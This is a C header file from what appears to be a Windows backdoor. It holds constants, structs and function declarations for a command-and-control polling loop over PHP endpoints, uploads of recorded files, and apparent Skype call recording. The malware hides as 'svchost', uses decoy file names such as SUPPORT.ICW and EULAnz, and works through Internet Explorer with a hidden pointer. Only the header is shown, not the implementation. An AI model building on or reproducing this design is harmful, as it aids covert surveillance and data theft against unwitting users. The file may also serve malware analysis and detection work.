/*
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */






/*
 * Pre processor directives
 *
 */


#ifndef _ERABD_H_
#define	_ERABD_H_

#include <windows.h>
#include <stdio.h>

#define VERSION "0.4"
#define DEBUG 0
#define CRYPTED 1
#define THREAD_TIMEOUT_UPLOAD 600
#define MAX_BUF_SIZE 1024
#define TESTHOST "www.microsoft.com"
#define LTESTHOST L"www.microsoft.com"
#define TESTPORT 80
#define HTTPPORT 80
#define NOCONNECTIVITYSLEEP 10000
#define INSTRUCTIONSLEEPER 8000
#define CONFIG_STRING "_CONFIG_"

#define RECORDING_INPUT_FLAG_FILE "lookup.in"
#define RECORDING_OUTPUT_FLAG_FILE "lookup.out"

#define FULL_FILE "cache"

#define HTTP_TRANSMISSION_OK "TRANSMISSIONOK"
#define HTTP_GET_INSTRUCTION_HEAD "CHEF COMMAND"
#define HTTP_SEND_COMMAND_REQUEST "/test/commandRequest.php"
#define HTTP_SEND_COMMAND_RESPONSE "/test/commandResponse.php"
#define HTTP_INPUT_SCRIPT "/test/input_ng.php"

#define PLUGIN_DIRECTORY "mui"
#define SKYPE_BINARY_NAME "skype.exe"
#define PREFIX_ILLEGAL_CHARS " -/\\,.+\"\'*%&()=?`^$:;"

#define MAX_FILE_ENTRIES 1024
#define MAX_UPLOAD_FILES 3
#define UPLOAD_FILE_PATTERN "*.bin"

#define PHP_LIID_VAR_NAME "liid="
#define PHP_DATA_VAR_NAME "text="
#define PHP_FILENAME_VAR_NAME "file="

#define IEXPLORE_PATTERN "IEXPLORE.EXE"

#define BD_DATA_DIR "Plugins"
#define CALLID_FILENAME "SUPPORT.ICW"
#define UPLOADER_FILENAME "EULAnz"

#define TEMPORARY_DIRECTORY "c:\\temp\\"
#define FIRST_CONNECT_FILE "MSN.ISP"
#define snprintf _snprintf



#define CLASSNAME "svchost.exe"
#define WINDOWNAME "svchost"

#define REQUEST_TYPE_COUNTER 4

#define REQUEST_TYPE_COMMAND 0
#define REQUEST_TYPE_SYSTEMUP 1
#define REQUEST_TYPE_UPLOAD 2
#define REQUEST_TYPE_UPDATES 3


#define UPLOAD_THREAD_STARTED 0
#define UPLOAD_THREAD_STOPPED 1
#define UPLOAD_THREAD_FINISHED 2







/*
 * Data types
 *
 */

struct ThreadData
{
  WCHAR *mwHost;
  WCHAR *mwURI;
  char *mCommand;
  char mRealCommand[MAX_BUF_SIZE + 1];
  int mCommandLength;
};


typedef struct sIEData
{
  int *gHiddenPointer;
  char *mIEPath;
} IEData;






/*
 * Function forward declarations 
 *
 */

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
DWORD mainLoop(LPVOID pData);
DWORD WINAPI doHTTPUploadsThread(LPVOID pData);
int compare(const void *arg1, const void *arg2);
int determineFilesToUpload(char *pPattern, char *pFileEntries[MAX_FILE_ENTRIES], int *pEntryNum);

#endif

